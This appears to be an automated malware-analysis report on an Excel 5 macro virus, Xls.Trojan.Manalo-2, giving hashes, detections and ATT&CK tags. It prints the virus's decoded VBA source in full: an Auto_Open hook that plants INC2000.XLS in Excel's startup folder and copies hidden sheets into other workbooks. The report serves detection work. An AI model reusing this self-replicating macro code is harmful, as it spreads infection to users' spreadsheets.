Xls.Trojan.Manalo-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 678ab84953b65f91…

MALICIOUS

Office (OLE)

Size: 784.5 KB
Created: 2000-03-20 16:27:22
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: a626c3dc6e692d9d9cc5b1967a529445
SHA-1: a9baee75fbf40319ac7b3204c977825402d389c4
SHA-256: 678ab84953b65f91c976d2c00fe70cefb8e2885b37e37d7a9e561cd505108250
242 Risk Score

Malware Insights

Xls.Trojan.Manalo-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as a malicious Excel 5 macro virus (Xls.Trojan.Manalo-2) by ClamAV. The Auto_Open VBA macro attempts to infect other Excel workbooks by copying its sheets into them and saving a new file named 'INC2000.XLS' in the application's startup path. This indicates a macro-based infection and propagation mechanism.

Heuristics 5

  • ClamAV: Xls.Trojan.Manalo-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Manalo-2
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 5

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9134 bytes
SHA-256: f59604cc6f418c0af6f440d3ceaff087c494e302d473cec88bfc575d8da9ea00
Detection
ClamAV: Xls.Trojan.Manalo-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DNA"




Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
        Application.OnSheetActivate = "User"

End Sub

Sub User()
Attribute User.VB_ProcData.VB_Invoke_Func = " \n14"
        
On Error GoTo Finish

date_today = Format(Now, "yyyymmdd")
        
Startup$ = Application.StartupPath
File$ = Dir(Startup$ & "\" & "INC2000.XLS")

If File$ <> "INC2000.XLS" Then GoTo FileDoesNotExist Else GoTo InfectOpenFile

FileDoesNotExist:
            
   Infected$ = ActiveWorkbook.Name
   
   Application.ScreenUpdating = False

   Set newBook = Workbooks.Add
    With newBook
        .Title = ""
        .Subject = ""
    End With
   
   NewWorkbook$ = ActiveWorkbook.Name
   Sheet$ = Workbooks(NewWorkbook$).Sheets(1).Name
        
   If Sheet$ <> "DNA" _
      Then
        Workbooks(Infected$).Sheets("FYM").Copy Before:=Workbooks(NewWorkbook$).Sheets(1)
        Workbooks(Infected$).Sheets("DNA").Copy Before:=Workbooks(NewWorkbook$).Sheets(1)
        Workbooks(NewWorkbook$).Sheets("DNA").Visible = False
        Workbooks(NewWorkbook$).Sheets("FYM").Visible = False
      Else
   End If

   ActiveWindow.Visible = False
      
   Workbooks(NewWorkbook$).SaveAs FileName:=Application.StartupPath & "/" & "INC2000.XLS"

GoTo Finish

InfectOpenFile:
        
   FileName$ = ActiveWorkbook.Name
   FirstSheet$ = Workbooks(FileName$).Sheets(1).Name
        
   Application.ScreenUpdating = False
   
   If FirstSheet$ <> "DNA" _
      Then
        Workbooks("INC2000.XLS").Sheets("DNA").Copy Before:=Workbooks(FileName$).Sheets(1)
        Workbooks("INC2000.XLS").Sheets("FYM").Copy After:=Workbooks(FileName$).Sheets("DNA")
        
'If (date_today >= "20000510") Then Workbooks(filename$).Sheets("FYM").Name = "FYManalo"
'If (date_today >= "20000510") Then Workbooks("INC2000.XLS").Sheets("FYM").Copy Before:=Workbooks(filename$).Sheets("FYManalo")
        
        
        Workbooks(FileName$).Sheets("DNA").Visible = False
        Workbooks(FileName$).Sheets("FYM").Visible = False
        
'If (date_today >= "20000510") Then Workbooks(filename$).Sheets("FYManalo").Visible = True
        
Else
If (date_today >= "20000510") Then Workbooks(FileName$).Sheets("FYM").Name = "FYManalo"
If (date_today >= "20000510") Then Workbooks("INC2000.XLS").Sheets("FYM").Copy Before:=Workbooks(FileName$).Sheets("FYManalo")
If (date_today >= "20000510") Then Workbooks(FileName$).Sheets("FYManalo").Visible = True
If (date_today >= "20000510") Then Workbooks(FileName$).Sheets("FYM").Visible = False

End If

Finish:
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "INC2000.XLS!User"

End Sub


' Processing file: /opt/analyzer/scan_staging/4db755bbf8634d5f913f6b8ecb391d90.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/DNA - 6121 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' 	FuncDefn (Sub Auto_Open())
' Line #5:
' 	LitStr 0x0004 "User"
' 	Ld Application 
' 	MemSt OnSheetActivate 
' Line #6:
' Line #7:
' 	EndSub 
' Line #8:
' Line #9:
' 	FuncDefn (Sub User())
' Line #10:
' Line #11:
' 	OnError Finish 
' Line #12:
' Line #13:
' 	Ld Now 
' 	LitStr 0x0008 "yyyymmdd"
' 	ArgsLd Format$ 0x0002 
' 	St date_today 
' Line #14:
' Line #15:
' 	Ld Application 
' 	MemLd StartupPath 
' 	St Startup$ 
' Line #16:
' 	Ld Startup$ 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	LitStr 0x000B "INC2000.XLS"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	St File$ 
' Line #17:
' Line #18:
' 	Ld File$ 
' 	LitStr 0x000B "INC2000.XLS"
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	GoTo FileDoesNotExist 
' 	Else 
' 	BoSImplicit 
' 	GoTo InfectOpenFile 
' 	EndIf 
' Line #19:
' Line #20:
' 	Label FileDoesNotExist 
' Line #21:
' Line #22:
' 	Ld ActiveWorkbook 
' 	MemLd New 
' 	St Infected$ 
' Line #23:
' Line #24:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #25:
' Line #26:
' 	SetStmt 
' 	Ld Workbooks 
' 	MemLd Add 
' 	Set newBook 
' Line #2
... (truncated)
ole10native_00.bin ole-package OLE Ole10Native stream: MBD0006DB86/Ole10Native 38180 bytes
SHA-256: 764d7393b19744a570246d85899ec3f9049322d7d83c9f6cf618c1008f179e74
ole10native_01.bin ole-package OLE Ole10Native stream: MBD0006DB8F/Ole10Native 36676 bytes
SHA-256: a7e601393bc6d38a6aceb5658cdd76874414a505a9136399746a9476d647a2e6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.56, consistent with packed or encrypted content.
ole10native_02.bin ole-package OLE Ole10Native stream: MBD0006DB95/Ole10Native 36228 bytes
SHA-256: 64021180958a1022c43e777ca7bbe5cd3e7847e7f48daccae1f74c75c0582f6f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.49, consistent with packed or encrypted content.
ole10native_03.bin ole-package OLE Ole10Native stream: MBD0006DB9A/Ole10Native 105220 bytes
SHA-256: 0564ccfcc8b704bb8f893dedd52ef3a82130caad9c64008c5229b321dbacf00a